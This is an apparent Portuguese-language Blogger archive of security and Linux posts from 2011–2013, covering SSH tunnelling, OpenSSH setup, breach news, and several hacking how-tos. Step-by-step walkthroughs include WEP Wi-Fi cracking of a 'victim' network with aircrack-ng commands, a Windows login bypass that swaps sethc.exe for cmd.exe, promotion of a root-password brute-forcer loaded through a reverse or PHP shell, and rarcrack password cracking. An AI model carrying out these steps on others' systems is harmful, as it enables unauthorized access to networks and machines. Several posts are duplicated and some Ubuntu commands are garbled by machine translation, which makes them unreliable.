Quas molestias excepturi

INSTALAR INTERFACE GRÁFICA NO UBUNTU SERVER

Para aqueles que precisam de um servidor, porém com interface gráfica para download de filmes...

Quas molestias excepturi
Impedit quo minus id

COMPARTILHAR UNIDADE DE DISCO OU PARTIÇÃO NO WINDOWS 7

Depois de algumas dificuldades enfrentadas para poder compartilhar uma partição do HD...

Impedit quo minus id
Voluptates repudiandae kon

OPENSSH SERVIDOR

Esta seção do Guia do Servidor Ubuntu introduz uma poderosa coleção de ferramentas para o controle remoto...

Voluptates repudiandae kon
Mauris euismod rhoncus tortor

INSTALANDO UM SERVIDOR LAMP NO UBUNTU 12.10

Se você é um desenvolvedor web (ou um fução, rs) e gostaria de ter seu próprio servidor em casa, uma das primeiras coisas que vai precisar...

Mauris euismod rhoncus tortor
Mostrando postagens com marcador Segurança. Mostrar todas as postagens
Mostrando postagens com marcador Segurança. Mostrar todas as postagens

sexta-feira, 25 de janeiro de 2013

Então você tem o MySQL no seu servidor web, mas ele só é aberto aos portos locais por padrão por razões de segurança. Se você deseja acessar seu banco de dados a partir de uma ferramenta de cliente como o MySQL Query Browser, normalmente você teria que abrir o acesso a partir do seu endereço IP local ... mas isso não é tão segura.
Então, em vez disso, vamos usar a porta encaminhamento através de um túnel SSH, para que o seu cliente MySQL pensa que está conectando a sua máquina localhost, mas é realmente conectar a outro servidor através do túnel.
Se você estiver usando a linha de comando ssh, o comando ficaria assim. (Você pode fazer a mesma coisa graficamente no Putty ou opções SecureCRT se precisar)
 ssh-L 3306: localhost: 3306 geek@webserver.com ou mysql -h 192.168.0.104 -u root -p
A sintaxe é ssh-L <localport> <username> <remoteport> hostname @ <nome_do_servidor>. Estamos usando localhost como o nome da máquina, porque estamos acessando diretamente o servidor mysql remoto através de ssh.Você também pode usar esta técnica para a porta para a frente através de um servidor ssh para outro servidor.
Se você já tem o MySQL rodando na sua máquina local, então você pode usar uma porta local diferente para o encaminhamento de porta, e apenas definir suas ferramentas de cliente para acessar o MySQL em uma porta diferente.
imagem
Uma vez que você tem o túnel ssh indo, você pode abrir o MySQL Query Browser e digite os detalhes para o seu servidor remoto, usando localhost como o host do servidor, e ajustar a porta para o que você usou.
Uma vez que você se acostumar com este método, você vai saber porque você já usou phpmyadmin ou a versão de linha de comando.
Postado por Unknown

sexta-feira, 11 de janeiro de 2013


Introdução


Esta seção do Guia do Servidor Ubuntu introduz uma poderosa coleção de ferramentas para o controle remoto de computadores em rede e transferência de dados entre computadores em rede, chamada OpenSSH . Você também vai aprender sobre algumas das configurações possíveis com a aplicação servidor OpenSSH e como alterá-las em seu sistema Ubuntu.

OpenSSH é uma versão livremente disponível do Seguro família de protocolo Shell (SSH) de ferramentas para controlar remotamente um computador ou a transferência de arquivos entre computadores. Ferramentas tradicionais utilizadas para realizar essas funções, tais como telnet ou rcp , são inseguras e transmitem a senha do usuário em texto puro quando usado.

OpenSSH fornece um daemon de servidor e ferramentas de cliente para facilitar o controle seguro, criptografado remoto e operações de transferência de arquivos, efetivamente substituindo as ferramentas antigas.

O componente de servidor OpenSSH, sshd , escuta continuamente para conexões de cliente de qualquer das ferramentas de cliente. Quando um pedido de conexão ocorre, sshd configura a conexão correta, dependendo do tipo de ferramenta de conexão cliente. Por exemplo, se o computador remoto está se conectando com o ssh aplicativo cliente, o servidor OpenSSH-se uma sessão de controle remoto após a autenticação.

Se um usuário remoto se conecta a um servidor OpenSSH com o scp , o daemon servidor OpenSSH inicia uma cópia segura de arquivos entre o servidor e o cliente após a autenticação. OpenSSH pode usar vários métodos de autenticação, incluindo senha simples, chave pública e Kerberos bilhetes.


Instalação

Instalação das aplicações cliente e servidor OpenSSH é simples. Para instalar os aplicativos cliente OpenSSH em seu sistema Ubuntu, use este comando em um prompt de terminal:
sudo apt-get install openssh-client

Para instalar o aplicativo de servidor OpenSSH, e os arquivos de suporte relacionados, use este comando em um terminal:
sudo apt-get install openssh-server

openssh-server pacote também pode ser selecionado para instalar durante o processo de instalação do Server Edition.


Configuração


Você pode configurar o comportamento padrão do aplicativo de servidor OpenSSH, sshd , editando o arquivo / etc / ssh / sshd_config . Para obter informações sobre as diretivas de configuração usadas neste arquivo, você pode ver a página do manual apropriado com o seguinte comando, executado em um prompt de terminal:
sshd_config homem

Há muitas diretrizes no sshd arquivo de configuração controlar coisas como configurações de comunicação e modos de autenticação. A seguir, são exemplos de diretivas de configuração que podem ser alteradas editando o arquivo / etc / ssh / sshd_config arquivo.
[Dica]
Antes de editar o arquivo de configuração, você deve fazer uma cópia do arquivo original e protegê-lo de escrita, assim você terá os ajustes originais como uma referência e reutilizar se necessário.
Copie o arquivo / etc / ssh / sshd_config arquivo e protegê-lo de escrever com os seguintes comandos, emitidos em um prompt de terminal:
sudo cp / etc / ssh / sshd_config / etc / ssh / sshd_config.original 
sudo chmod aw / etc / ssh / sshd_config.original

A seguir, são exemplos de diretrizes de configuração que você pode mudar:
  • Para definir seu OpenSSH para escutar na porta TCP 2222 em vez do padrão a porta TCP 22, alterar a directiva Porto como tal:
    Porto 2222
  • Para ter o sshd permitir públicas credenciais baseadas em chaves de login, simplesmente adicione ou modifique a linha:
    PubkeyAuthentication sim
    No arquivo / etc / ssh / sshd_config arquivo, ou se já estiver presente, garantir que a linha não está comentada.
  • Para fazer o seu servidor OpenSSH exibir o conteúdo do arquivo / etc / issue.net arquivo como um banner de pré-login, basta adicionar ou modificar a linha:
    Bandeira / etc / issue.net
    No arquivo / etc / ssh / sshd_config arquivo.
Depois de fazer alterações no arquivo / etc / ssh / sshd_config arquivo, salve o arquivo e reinicie o sshd aplicativo de servidor para efetuar as alterações usando o seguinte comando em um terminal:
sudo / etc / init.d / ssh restart
[AVISO]
Muitas outras diretivas de configuração para sshd estão disponíveis para alterar o comportamento do servidor para atender às suas necessidades. Esteja ciente, no entanto, se seu único método de acesso a um servidor é ssh , e você cometer um erro na configuração sshd através do arquivo / etc / ssh / sshd_config arquivo, você pode achar que você está trancado para fora do servidor no reiniciá-lo, ou que o sshd servidor se recusa a iniciar devido a uma diretiva de configuração incorreta, então seja extremamente cuidadoso ao editar este arquivo em um servidor remoto.

Chaves SSH


SSH chaves permitir a autenticação entre os dois exércitos, sem a necessidade de uma senha. Chave de autenticação SSH utiliza duas chaves de uma privada e uma chave pública chave.
Para gerar as chaves, a partir de um terminal digite:
ssh-keygen-t dsa
Isto vai gerar as chaves usando um DSA identidade de autenticação do utilizador. Durante o processo, você será solicitado para uma senha. Basta bater Enter quando solicitado a criar a chave.
Por padrão, o público chave é guardada no arquivo ~ / .ssh / id_dsa.pub , enquanto ~ / .ssh / id_dsa é o privadochave. Agora copie o id_dsa.pub arquivo para o host remoto e anexá-lo para ~ / .ssh / authorized_keys , digitando:
ssh-copy-id username @ remotehost
Por fim, verifique as permissões no authorized_keys arquivo, somente o usuário autenticado deve ter permissões leitura e gravação. Se as permissões não estão corretas alterá-las:
chmod 600 .ssh / authorized_keys
Agora você deve ser capaz de SSH para o host sem ser solicitado para uma senha.

Postado por Unknown

quarta-feira, 12 de setembro de 2012


Em média, 120 policiais militares vão para a reserva todos os meses, sem contar os que estão com várias férias vencidas.

O efetivo da policia militar do estado de Sergipe está ficando cada vez menor e isso pode complicar ainda mais a segurança publica, já que o número de militares para fazer o policiamento ostensivo não é suficiente.

Em menos de uma semana, fui publicado no Boletim Geral Ostensivo (BGO), o nome de 46 policiais militares que foram reformados, ou seja, foram para a reserva remunerada da corporação. Na ultima quinta-feira, foram 38 e nesta quarta-feira (12), mais 8 PMs foram aposentados.

Diariamente é publicado no BGO, os nomes dos PMs que são aposentados, alem daqueles que estão afastados do serviço por outro motivo, a exemplo de férias, doença, processos e outros. Dessa maneira, com um efetivo de pouco mais de 4 mil homens, sendo que disponíveis e aptos ao trabalho seriam em torno de 3 mil, a escala de serviço começa a apertar e com isso o militar passa a prestar um serviço que muitas vezes não agrada a população.

Embora o esforço do comandante geral, coronel Mauricio Iunes, não se nota a diminuição no índice de criminalidade no estado. Isto por conta do pequeno numero de militares à disposição do comando, que mesmo querendo e se esforçando, não tem conseguido frear o crime.

No inicio, quando assumiu o comando, o coronel Iunes conseguiu trazer para a corporação alguns desviados de função, porem não foi o suficiente e isso, somado ao numero de militares que vão para a reserva, diminui o efetivo.

Exemplo disso, foi a publicação feita no BGO na semana passada, onde constava que o déficit de soldados na corporação era em torno de 3 mil soldados. Isso significa que o governo do estado não está tendo mais prazo para realizar o concurso, já que mesmo que isso seja feito, o aprovado só estará pronto e apto para o trabalho, no mínimo, seis meses depois. Ou o governo realiza o concurso imediatamente, ou a criminalidade vai tomar conta do estado.

Fonte: AMESE
Postado por Unknown

sábado, 28 de julho de 2012


A ferramenta Rootdabitch v0.1 foi desenvolvida pelo hacker r00tw0rm e é uma excelente pedida para quebrar senhas de root em sistemas locais. Usando aplicações multithreaded para realizar os ataques em força bruta, a ferramenta pode ser usada em segundo plano sem consumir muito processamento da máquina e ainda lhe envia o resultado por email.

Para ataques em máquinas remotas, tudo o que você vai precisar é de um Shell reverso ou um Shell PHP para carregar o script na máquina, dar-lhe permissão de execução e executá-lo. Após a aplicação terminar de executar, o resultado estará gravado em password.txt no diretório onde o script foi executado.
Para baixar o Rootdabitch v0.1 acesse esse link.
Postado por Unknown

segunda-feira, 23 de julho de 2012



Precisamos de um sistema operacional secundário para gerenciar alguns arquivos dentro da pasta Windows/System32/

Quebrando a proteção

Dentro do Linux, acesse o diretório do Windows (Sistema de Arquivos/host/Windows/System32), nesta última pasta, procure pelo arquivo: sethc.exe – e o renomeie para: sethc_OLD.exe
Na mesma pasta, procure pelo arquivo: cmd.exe e o duplique, renomeando a cópia para sethc.exe

Feito isso, saia do Ubuntu e entre no Windows.
Removendo a senha do Windows
Na tela de Login pressione a tecla “SHIFT” até aparecer a janela “Ativar teclas de aderência“, clique Não. Após fechar esta janela, abrirá o Prompt de comandos do Windows.
Digite o seguinte comando seguido por Enter: control userpasswords2
Surgirá a janela de Gerenciamento de usuários… Pronto, agora você precisa clicar sobre o usuário e redefinir a senha. Entre com uma nova senha, e se não quiser usá-la mais, acesse painel de controle >>contas de usuário >>  exclua a senha.
Dúvidas? É só comentar.

Essa dica foi testa e é funcional. 
Postado por Unknown

terça-feira, 17 de julho de 2012

1º. Kevin Mitnick
Um dos mais famosos hackers de todos os tempos, Mitnick chegou a roubar 20 mil números de cartões de crédito e assombrava o sistema telefônico dos EUA. Mitnick foi o primeiro hacker a entrar para a lista dos 10 criminosos mais procurados pelo FBI.
2º. Adrian Lamo
Na lista de invasões do jovem hacker americano estão os sites da Microsoft, do Yahoo! e do jornal The New York Times.

3º. Raphael Gray

O hacker britânico Raphael Gray, 19, foi condenado por roubar 23 mil números de cartões de crédito, entre eles um de Bill Gates.
4º Jonathan James
Preso aos 16 anos, o hacker invadiu uma das agências Departamento de Defesa americano responsável por reduzir a ameaça de armas nucleares, biológicas e químicas. Lá, o jovem instalou um backdoor para roubar senhas de empregados da agência.
5º. Jon Lech Johansen
Conhecido como DVD Jon, o hacker norueguês ganhou fama após burlar os sistemas de proteção dos DVDs comerciais. Tais códigos são usados pela indústria cinematográfica para impedir que o conteúdo seja reproduzido em áreas diferentes das de venda.
6º. Vladimir Levin
O criminoso russo liderou uma gangue que invadiu computadores do Citibank e desviou US$ 10 milhões, em 1994. Foi preso em Londres um ano depois.

7º. Onel de Guzman 

Com apenas 23 anos, o filipino Onel de Guzman causou um prejuízo de US$ 10 bilhões com seu vírus “I Love You”, que atingiu sistemas de e-mail no mundo todo.
8º. Kevin Poulsen
Kevin Poulsen ganhou um Porsche em um concurso realizado por uma rádio americana. O 102º ouvinte que telefonasse para a emissora, levava o carro. Poulsen invadiu a central.
9º. Robert Morris
O americano, filho do cientista chefe do Centro Nacional de Segurança Computacional dos EUA, espalhou o primeiro worm que infectou milhões de computadores e fez grande parte da Internet entrar em colapso, em 1988.
10º. David L. Smith
Com o vírus Melissa, o programador conseguiu derrubar servidores de grandes empresas, como Intel, Lucent e Microsoft. Em 2002, o hacker foi condenado a 22 meses de prisão.
Fonte: Lista 10
Postado por Unknown
1º. Kevin Mitnick
Um dos mais famosos hackers de todos os tempos, Mitnick chegou a roubar 20 mil números de cartões de crédito e assombrava o sistema telefônico dos EUA. Mitnick foi o primeiro hacker a entrar para a lista dos 10 criminosos mais procurados pelo FBI.
2º. Adrian Lamo
Na lista de invasões do jovem hacker americano estão os sites da Microsoft, do Yahoo! e do jornal The New York Times.

3º. Raphael Gray

O hacker britânico Raphael Gray, 19, foi condenado por roubar 23 mil números de cartões de crédito, entre eles um de Bill Gates.
4º Jonathan James
Preso aos 16 anos, o hacker invadiu uma das agências Departamento de Defesa americano responsável por reduzir a ameaça de armas nucleares, biológicas e químicas. Lá, o jovem instalou um backdoor para roubar senhas de empregados da agência.
5º. Jon Lech Johansen
Conhecido como DVD Jon, o hacker norueguês ganhou fama após burlar os sistemas de proteção dos DVDs comerciais. Tais códigos são usados pela indústria cinematográfica para impedir que o conteúdo seja reproduzido em áreas diferentes das de venda.
6º. Vladimir Levin
O criminoso russo liderou uma gangue que invadiu computadores do Citibank e desviou US$ 10 milhões, em 1994. Foi preso em Londres um ano depois.

7º. Onel de Guzman 

Com apenas 23 anos, o filipino Onel de Guzman causou um prejuízo de US$ 10 bilhões com seu vírus “I Love You”, que atingiu sistemas de e-mail no mundo todo.
8º. Kevin Poulsen
Kevin Poulsen ganhou um Porsche em um concurso realizado por uma rádio americana. O 102º ouvinte que telefonasse para a emissora, levava o carro. Poulsen invadiu a central.
9º. Robert Morris
O americano, filho do cientista chefe do Centro Nacional de Segurança Computacional dos EUA, espalhou o primeiro worm que infectou milhões de computadores e fez grande parte da Internet entrar em colapso, em 1988.
10º. David L. Smith
Com o vírus Melissa, o programador conseguiu derrubar servidores de grandes empresas, como Intel, Lucent e Microsoft. Em 2002, o hacker foi condenado a 22 meses de prisão.
Fonte: Lista 10
Postado por Unknown

Antivírus é um software responsável pela detecção, desinfecção e remoção de pragas digitais como vírus, trojans (cavalos de tróia), worms e qualquer outro tipo de código malicioso, não se limitando somente aos vírus como o nome sugere. Alguns antivírus também removem adwares e spywares, tarefa antes reservada apenas aos anti-spywares.
O antivírus funciona com um banco de dados chamado de lista de definição. Essa lista contém informações para que o antivírus consiga identificar quais arquivos são bons e quais são maliciosos. Em outras palavras, para que ele consiga detectar um vírus, é necessário que esse vírus esteja na lista definição. Esse é o motivo pelo qual os antivírus requerem atualização constante: para detectar os vírus mais recentes, a lista de definição precisa ser a mais nova possível. As companhias antivírus capturam os vírus que estão circulando na rede e também recebem exemplares de seus usuários para atualizar a sua lista de definição.
Existem algumas técnicas, conhecidas genericamente pelo termo de heurística que analisa a estrutura de um arquivo e, algumas vezes, também o seu funcionamento. Estas técnicas permitem que um antivírus detecte um vírus que ainda não está presente em sua lista de definição.

Onde posso obter um antivírus?

Algumas lojas de informática vendem softwares antivírus, mas você também pode baixá-los pela web para testá-los antes de comprá-los. Outros antivírus também estão disponíveis gratuitamente (freeware), o que lhe permite baixá-los e usá-los no seu computador sem precisar gastar dinheiro.
Postado por Unknown

Antivírus é um software responsável pela detecção, desinfecção e remoção de pragas digitais como vírus, trojans (cavalos de tróia), worms e qualquer outro tipo de código malicioso, não se limitando somente aos vírus como o nome sugere. Alguns antivírus também removem adwares e spywares, tarefa antes reservada apenas aos anti-spywares.
O antivírus funciona com um banco de dados chamado de lista de definição. Essa lista contém informações para que o antivírus consiga identificar quais arquivos são bons e quais são maliciosos. Em outras palavras, para que ele consiga detectar um vírus, é necessário que esse vírus esteja na lista definição. Esse é o motivo pelo qual os antivírus requerem atualização constante: para detectar os vírus mais recentes, a lista de definição precisa ser a mais nova possível. As companhias antivírus capturam os vírus que estão circulando na rede e também recebem exemplares de seus usuários para atualizar a sua lista de definição.
Existem algumas técnicas, conhecidas genericamente pelo termo de heurística que analisa a estrutura de um arquivo e, algumas vezes, também o seu funcionamento. Estas técnicas permitem que um antivírus detecte um vírus que ainda não está presente em sua lista de definição.

Onde posso obter um antivírus?

Algumas lojas de informática vendem softwares antivírus, mas você também pode baixá-los pela web para testá-los antes de comprá-los. Outros antivírus também estão disponíveis gratuitamente (freeware), o que lhe permite baixá-los e usá-los no seu computador sem precisar gastar dinheiro.
Postado por Unknown

segunda-feira, 16 de julho de 2012


Um novo malware foi detectado em um arquivo JAR auto-assinado, como parte de um ataque de engenharia social para obter backdoor em Sistemas Operacionais. O arquivo JAR, que parece ter sido gerado pelo TrustedSec, um Toolkit de Engenharia Social, está implantando malwares no Windows, Mac OS X e no Linux.Se o usuário desavisado permite a execução do JAR, ele baixa um shell backdoor específico para a plataforma.
Cada uma das diferentes versões do shell se comporta da mesma forma, ligando-0 de volta com uma porta (8080 no Mac OS X, 8081 no Linux e 8082 no Windows) no endereço IP 186.87.69.249 (que parece ser um IP alocado dinamicamente, pertencente a uma empresa de cabeamento estruturado).
A versão para Linux deste vírus não é nova, mas tem sido recorrentemente usada por criminosos. Com relação as medidas de segurança que você pode tomar para se proteger desta (e outras ameaças), NUNCA dê permissão de execução para arquivos ou aplicações que você não conhece, e tome muito cuidado com o permissionamento recursivo a diretórios. Um exemplo claro disso é o famoso comandochmod -R 777 que dá plenos poderes de leitura, escrita e execução de forma recursiva em diretórios do sistema.
Postado por Unknown

Um novo malware foi detectado em um arquivo JAR auto-assinado, como parte de um ataque de engenharia social para obter backdoor em Sistemas Operacionais. O arquivo JAR, que parece ter sido gerado pelo TrustedSec, um Toolkit de Engenharia Social, está implantando malwares no Windows, Mac OS X e no Linux.Se o usuário desavisado permite a execução do JAR, ele baixa um shell backdoor específico para a plataforma.
Cada uma das diferentes versões do shell se comporta da mesma forma, ligando-0 de volta com uma porta (8080 no Mac OS X, 8081 no Linux e 8082 no Windows) no endereço IP 186.87.69.249 (que parece ser um IP alocado dinamicamente, pertencente a uma empresa de cabeamento estruturado).
A versão para Linux deste vírus não é nova, mas tem sido recorrentemente usada por criminosos. Com relação as medidas de segurança que você pode tomar para se proteger desta (e outras ameaças), NUNCA dê permissão de execução para arquivos ou aplicações que você não conhece, e tome muito cuidado com o permissionamento recursivo a diretórios. Um exemplo claro disso é o famoso comandochmod -R 777 que dá plenos poderes de leitura, escrita e execução de forma recursiva em diretórios do sistema.
Postado por Unknown

sábado, 14 de julho de 2012


Quem usa a mais famosa rede social do mundo sabe que quase todo o dia surge um novo vírus, que faz as pessoas criarem spams sem saberem e que algumas vezes podem até mesmo acabar infectando o computador dela.
Vendo esses problemas crescendo, o Facebook resolveu dar um ponto final e criou o Malware Checkpoint, que irá mandar um aviso para usuários possivelmente infectados, pedindo que ele instale um antivírus e se livre da ameaça. Assim que o processo estiver completo sua conta estará pronta para ser usada novamente.
facebook-virus
Então fique esperto, pois quando fizer login no Facebook, pode ser que surja um aviso para você instalar algum antivírus e obviamente isso não será um vírus, mas sim apenas a rede social tentando melhorar ela para seus usuários, afinal ninguém mais aguenta esses pragas que espalham spams por todos os cantos.
Então não deixe de recomendar esse post e espalhar essa notícia, quem sabe um dia teremos uma rede social sem ou pelo menos com menos vírus!


Artigo originalmente publicado por Minilua
Postado por Unknown

Quem usa a mais famosa rede social do mundo sabe que quase todo o dia surge um novo vírus, que faz as pessoas criarem spams sem saberem e que algumas vezes podem até mesmo acabar infectando o computador dela.
Vendo esses problemas crescendo, o Facebook resolveu dar um ponto final e criou o Malware Checkpoint, que irá mandar um aviso para usuários possivelmente infectados, pedindo que ele instale um antivírus e se livre da ameaça. Assim que o processo estiver completo sua conta estará pronta para ser usada novamente.
facebook-virus
Então fique esperto, pois quando fizer login no Facebook, pode ser que surja um aviso para você instalar algum antivírus e obviamente isso não será um vírus, mas sim apenas a rede social tentando melhorar ela para seus usuários, afinal ninguém mais aguenta esses pragas que espalham spams por todos os cantos.
Então não deixe de recomendar esse post e espalhar essa notícia, quem sabe um dia teremos uma rede social sem ou pelo menos com menos vírus!


Artigo originalmente publicado por Minilua
Postado por Unknown
Ontem fiz download de um arquivo RAR e para minha surpresa o mesmo estava com senha. Antes de procurar outros links resolvi tentar quebrar a senha deste arquivo mesmo, e buscando uma solução no Google eis que acho o rarcrack, um brute force para arquivos .rar, .zip e 7-zip. 



Faça download do arquivo em:

Feito o download, como root, navegue até a pasta onde salvou o arquivo e faça: 

# tar -xjf rarcrack-VERSAO.tar.bz2
# cd rarcrack-VERSAO
 

Você precisará do gcc ou outro compilador C: 

# make
# make install
 

Pronto, instalado. 

Para usar o rarcrack: 

# rarcrack --type *rar nomedoarquivo.rar 

* o type fica a seu critério, dependendo do seu arquivo compactado. 

Obs.: Infelizmente acabei não lembrando de cronometrar o processo. Mas após 30~45min o arquivo já estava extraído. 
Abraços.

Fonte: Viva o Linux
Postado por Unknown

sexta-feira, 13 de julho de 2012

Faça download do BackTrack 5 aqui depos grave e de boot no dvd e vai pedir senha e login

login: root
senha: toor
depois digite (startx) sem parentese para iniciar o BackTrack 5

Abra o console para digitar os comandos

1: airmon-ng (esse comando faz com que o bt5 reconheça sua placa de rede)
2: airmon-ng start wlan0 (esse comando faz com que fique em modo monitor)
3: airodump-ng mon0 (esse comando faz com que ele procure as redes ao seu redor)

abra outro console

4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0 (esse comando faz com que vc monitore a rede da vitima)

abra outro console

5: aireplay-ng -5 -b (bssid) mon0 (espere ele vai pedir para você digitar y (yes) depois enter. Com esse comando você pega os pacotes da vitima)

abra outro console

6: aireplay-ng -1 1 -a (bssid) mon0(esse comando captura os pacotes criptografados da vitima)

abra outro console

7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy(esse comando captura os date da vitima)

abra outro console

8: airopley-ng -3 -r arpy -b (bssid) mon0

abra outro console

9: aircrack-ng nome rede-01.ivs(aqui é o final e a hora de você saber a senha da rede wep. Eu aconselho a você esperar pelo menos ate 10.000 pacotes para pegar a senha, mas se você quiser com 5.000 pacotes é aceitável).

Fonte: Desconhecido
Não mim responsabilizo pelos seus atos teste em sua rede. 
Postado por Unknown

sábado, 23 de junho de 2012

Após a divulgação de que milhares de senhas de usuários da redes sociais haviam sido expostas na web, pouco se falou sobre o assunto, apenas, que tudo seria investigado. Com isso, a reputação da rede social está em baixa, já que, não foram emitidas muitas informações sobre o assunto, deixando os usuários receosos. 


O LinkedIn possui mais de 160 milhões de usuários e, com tudo isso, a rede social só tem a perder. Como satisfação para os usuários, a rede social disse apenas que precisa de mais dias para avaliar a real dimensão do problema.
Especialistas de segurança na internet  já haviam comentado que o Linkedln não possuía um nível de segurança considerado bom para salvar o registro de informações. Sem obter sucesso com o FBI, já que não conseguir descobrir nada sobre como mais de cinco milhões de senhas foram surrupiadas, a rede social está contando com a ajuda de especialistas forenses. 
Postado por Unknown

sexta-feira, 15 de junho de 2012


Fundadores da parceria foram os gigantes da Internet e populares da redes sociais: Facebook, Google, Twitter, AOL entre outrosEssas empresas vão lutar pela integridade de publicidade, fornecendo uma plataforma para o intercâmbio de informações sobre maus atores e compartilhando as tendências relevantes com os decisores políticos e organismos responsáveis ​​pelo cumprimento.
     O diretor global de políticas públicas do GoogleEric Davis disse que a Aliança Integridade Ad "servirá como um fórum para essas empresas para" trabalhar em conjunto para proteger os usuários de anúncios ruins e reforçar a confiança no ecossistema publicidade . "Isso é importante, disse ele, porque quando o usuário se sente traído" põe em risco a confiança da Web ". Facebook, Twitter, Google, AOL e IAB têm sido aliados com o objetivo de acabar com anúncios de spam e malicioso . Esta é uma iniciativa para proteger os usuários de ser enganado e ter mais confiança em publicidade online.
      Confiança pelo usuário para comprar um produto através da Internet tem sido sempre muito baixo. Isto é devido à proliferação de anúncios de spam e malicioso. Isto põe em perigo a infra-estrutura de propaganda que suporta sites. Por isso, é importante que as empresas de Internet grandes combater essas fraudes.
Para acabar com o problema, fundou a chamada Aliança de Integridade do anúncio, que foi criado pela organização sem fins lucrativos StopBadware, que luta contra malware. O objetivo é atenuar os anúncios ruins através do desenvolvimento de melhores práticas e recomendações de políticas para websites, provedores de serviços e desenvolvedores de software.
      Como declarou o diretor-executivo da organização Maxim Weinstein , "ninguém pode lidar com escala de Internet ameaças por conta própria, por isso estamos reunindo as organizações líderes da indústria para resolver o problema juntos. "
Postado por Unknown

quinta-feira, 14 de junho de 2012

Cada usuário do Facebook é único ou serão em breve ver um link no topo do seu feed de notícias da área de trabalho pedindo-lhes para "Fique no controle de sua conta, seguindo estas dicas simples de segurança". O link leva para o da página Segurança Facebook onde os usuários são ensinados a identificar uma fraude, escolha uma senha única, e o mais interessante, confirmar seu número de telemóvel para a recuperação de conta.
     Facebook confirmou que a mensagem vai rolar a todos os usuários de desktops ao longo dos próximos dias, e milhões de pessoas estão vendo isso agora. E embora possa parecer uma resposta a outras violações de segurança recentes na web, o Facebook diz que esse alerta de segurança foi planejado antes de aqueles que aconteceu. 
    Aqui está o porquê de ter números de telefone confirmados poderia ajudar a evitar um fiasco Facebook LinkedIn-esque ...
     Se o Facebook fosse hackeado ou um indivíduo tem sua conta roubada, tendo números de telefone confirmados permite Facebook limpar senhas das pessoas imediatamente e enviá-los novos através de SMS. Isso significa que ele não teria que confiar em e-mail aos usuários levá-los a alterar suas próprias senhas, que o blogue Cloudmark demonstrou não funcionar tão bem desde que essas mensagens geralmente são ignoradas como spam.
     O mundo passou a confiar tanto no Facebook que alguém permanentemente, ou até mesmo perder temporariamente o acesso a sua conta pode jogar uma chave gigante em sua vida social. Ao longo dos anos Facebook adicionou mais maneiras para recuperar contas perdidas através da  identificação de amigos em fotos e respondendo a questões de segurança .
     Os teóricos da conspiração poderiam sugerir o Facebook está ganhando dinheiro com temores de segurança recentes ingerir até mais números de telefone móveis. Mas, realmente, ele provavelmente só quer reduzir o número de histórias de horror de desconexão. Ah, e os pedidos de clientes de serviços caros que exigem ajuda de um ser humano com a recuperação de conta. Se o Facebook pode convencer as pessoas a manter suas contas mais seguro e verificar seus números de telefone, os robôs podem fazer o resto do trabalho lutando contra os bandidos e reparação de seu dano.
Postado por Unknown

terça-feira, 10 de janeiro de 2012

Pai de todos

     Em Setembro de 2011, a comunidade da segurança da informação viu todas as luzes de alerta se acenderem simultaneamente com a descoberta de um novo tipo de malware.
   Não era um malware qualquer, mas "aquele" malware, cujo surgimento era profetizado desde o início da era da computação. O Mebromi foi a primeira ameaça virtual capaz de infectar a BIOS (Basic Input/Output System). A BIOS é um programa fundamental, residente dentro de um chip na placa-mãe do computador, responsável por inicializar todo o hardware do computador.
    É esse programa que liga a memória, o processador, o disco rígido, e tudo o mais. Como ele trabalha no nível mais baixo possível, nenhum programa antivírus está rodando no momento em que a BIOS é acionada.

Infecção da BIOS e MBR

        Alterações mal-intencionadas no software básico do computador podem ser devastadoras, passando despercebidas por todos os sistemas de proteção existentes. "Mudanças não autorizadas na BIOS podem viabilizar ou ser parte de um ataque sofisticado e dirigido, permitindo que um invasor se infiltre nos sistemas de uma organização e trave todo o seu funcionamento," afirmou Andrew Regenscheid, do Instituto Nacional de Padronização e Tecnologia dos Estados Unidos.
       Apesar disso, o Mebromi foi considerado uma ameaça de risco baixo. Mesmo infectando a BIOS e o registro principal de inicialização (MBR), ele depende de um arquivo a ser baixado pela internet e não faz grandes estragos no computador. Mas seu princípio de operação é potencialmente muito perigoso.

Aberto a sugestões

    Os pesquisadores não ficaram parados e, analisando o código do primeiro malware da BIOS, elaboraram uma proposta de regras de segurança a serem seguidas por fabricantes de computador e profissionais de segurança da informação. O documento explica os fundamentos de uma avaliação da integridade da BIOS, uma forma de detectar se o programa básico do computador foi modificado. E, principalmente, de como alertar a ocorrência ao usuário, uma vez que o sistema operacional nem terá começado a funcionar nesse momento. 
      Não são regras para os usuários, mas para que os fabricantes tornem os computadores que ainda serão fabricados mais seguros contra o novo tipo de ameaça - daí o sentido de urgência com que o material está sendo lançado.  O documento, ainda aberto a comentários da comunidade de segurança da informação, está disponível no endereço  http://csrc.nist.gov/publications/drafts/800-155/draft-SP800-155_Dec2011.pdf
Postado por Unknown

quinta-feira, 9 de junho de 2011

A página principal do site brasileiro da companhia antivírus japonesa Trend Micro foi desfigurada por volta da meia noite desta quinta-feira (9). O ataque foi assinado pelo grupo “aneurysm.inc” e por um hacker que usa o nome de “magnific”. A página desfigurada ficou pouco tempo no ar.
“Faz o seguinte então, me arranja um emprego, estou cansado de roubar”, afirma a mensagem deixada pelo invasor, que também faz várias acusações contra a Trend Micro. A página continha apenas a mensagem e nenhum vírus.
Registros de ataques do grupo “Aneurysm.inc” começaram no site Zone-H, em 2004. Entre as páginas invadidas estão vários sites do governo.
A Trend Micro não é a única empresa de segurança a ter problemas do gênero. A Symantec também já teve páginas comprometidas e a Kaspersky teve um vírus hospedado em suas páginas. A McAfee, que também fornece os serviços de segurança de sites “McAfee Secure”, também já teve falhas encontradas em suas páginas web.
Em 2008, sites internacionais da própria Trend Micro foram infectados com código malicioso. A Trend tem a terceira maior fatia do mercado de antivírus, estando atrás de McAfee e Symantec.

Veja abaixo a mensagem deixada no site desfigurado da Trend Micro. Mensagem deixada pelo invasor da página da Trend Micro (Foto: Reprodução)
Postado por Unknown